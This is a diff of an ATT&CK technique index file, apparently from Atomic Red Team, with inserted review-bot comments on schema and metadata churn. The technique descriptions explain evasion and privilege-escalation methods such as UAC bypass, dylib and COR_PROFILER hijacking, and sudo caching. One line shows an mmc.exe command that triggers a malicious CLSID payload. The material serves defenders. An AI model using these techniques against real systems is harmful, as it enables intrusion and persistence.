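Review bot: the `Mandiant M-Trends 2020` URL is swapped from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` but the description still says `Retrieved April 24, 2020`, a date on which a path containing `2021-09` cannot have existed. Every other URL refresh in this diff updates the retrieval date alongside the link (harmj0y to September 23, 2024; the x.com status and the File Streams page to September 12, 2024), so this one should either carry a new retrieval date or, if it was taken verbatim from upstream, be flagged there. Also in this hunk, `x_mitre_permissions_required: User` is dropped from T1578.001 with no replacement while the version bumps to 1.2; fine if that mirrors the source object, but worth a line in the PR description since it removes a field some consumers display.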
@@ -13843,6 +14128,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13853,13 +14139,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -13918,11 +14203,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13962,8 +14246,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -13971,13 +14257,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -14008,9 +14294,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Azure Persistence Automation Runbook Created or Modified
@@ -14150,7 +14433,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14172,11 +14455,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
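Review bot: `spec_version: '2.1'` is dropped from the Environmental Keying object in this hunk and from every other technique object in the patch, with no replacement. If anything downstream (the index CSV generator, a test runner, a schema check) reads `technique.spec_version`, this is a silent schema change; if the field was only STIX metadata passed through, a one-line note in the PR description that the new generator omits it would spare the next reader the same check.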
@@ -14243,8 +14525,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14262,7 +14544,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -14365,12 +14646,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14383,6 +14663,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -14419,17 +14700,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
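Review bot: the platform list for T1556 drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider` (with `x_mitre_version` going from 2.4 to 2.5), and T1484.002 further down makes the same swap (`Azure AD` and `SaaS` replaced by `Identity Provider`). Anything that derives per-platform views from `x_mitre_platforms` needs to know the two new platform names and needs a decision on what happens to entries keyed on the three removed ones; please confirm those views were regenerated in the same change rather than left keyed on the old names.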
@@ -14475,9 +14756,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
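Review bot: this hunk removes `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` from the bottom of the T1556 object while the two earlier hunks of the same object re-add them higher up, next to `x_mitre_contributors` and `x_mitre_platforms`; the net change for both keys is nil, and the same move-only churn appears again for T1574.011 and T1053.003 below. Consider having the generator serialize technique keys in a stable order (sorted, or the upstream bundle's order) so a position change does not surface as an add/remove pair in every object; with the current diff a real field loss is hard to tell apart from a relocation.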
@@ -14515,7 +14793,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14534,7 +14812,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -14565,7 +14842,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14589,12 +14866,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
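Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1556.004 here and, unlike T1556 and T1574.011, no hunk in this patch re-adds `x_mitre_attack_spec_version` for this object; the same holds for T1601.002, T1564.010, T1574.012, T1055.011 and T1548.003 below. Since the other objects keep the field or are upgraded to `x_mitre_attack_spec_version: 3.2.0`, please check whether these six genuinely lack it upstream or lost it in generation; counting occurrences of `x_mitre_attack_spec_version` in the file before and after would settle it quickly.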
@@ -14678,7 +14953,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -14700,7 +14974,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -14734,12 +15008,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14791,9 +15063,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1211:
@@ -14862,7 +15133,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -14909,7 +15179,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -14922,12 +15192,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
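Review bot: two data sources, `'Module: Module Load'` and `'Process: Process Metadata'`, are added to T1127 while the `modified` value in the hunk just above goes from `'2022-05-24T14:00:00.188Z'` back to `'2022-05-05T05:00:37.443Z'`. Content growing under an older timestamp is consistent with the earlier value having been a bulk-set placeholder, but it also means `modified` cannot be relied on to tell what changed between regenerations; if any tooling diffs this index against ATT&CK releases by timestamp, it should compare the object content (or `x_mitre_version`) instead.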
@@ -15006,7 +15277,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -15028,7 +15299,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -15071,7 +15341,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15095,8 +15365,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -15144,7 +15412,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15182,8 +15450,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -15232,7 +15498,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15284,29 +15550,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15353,7 +15618,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -15385,8 +15650,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15400,6 +15665,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
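Review bot: the new `Red Canary - Atomic Red Team` reference resolves the `(Citation: Red Canary - Atomic Red Team)` key introduced in the rewritten T1053.005 description, so the citation is consistent; note, though, that its URL points at `.../blob/master/atomics/T1053.005/T1053.005.md`, i.e. upstream ATT&CK now cites this repository's own test page back into the index. That is fine as passed-through data, but it means renaming or moving that file would break an upstream citation, so this entry should stay generated and not be hand-edited.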
@@ -15412,11 +15681,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
@@ -15482,7 +15754,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -15571,7 +15842,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -15659,7 +15929,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -15744,7 +16013,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -15776,7 +16044,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15799,11 +16067,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15861,14 +16128,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15969,7 +16235,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -16000,7 +16265,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16034,13 +16299,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -16059,7 +16322,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -16073,7 +16335,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
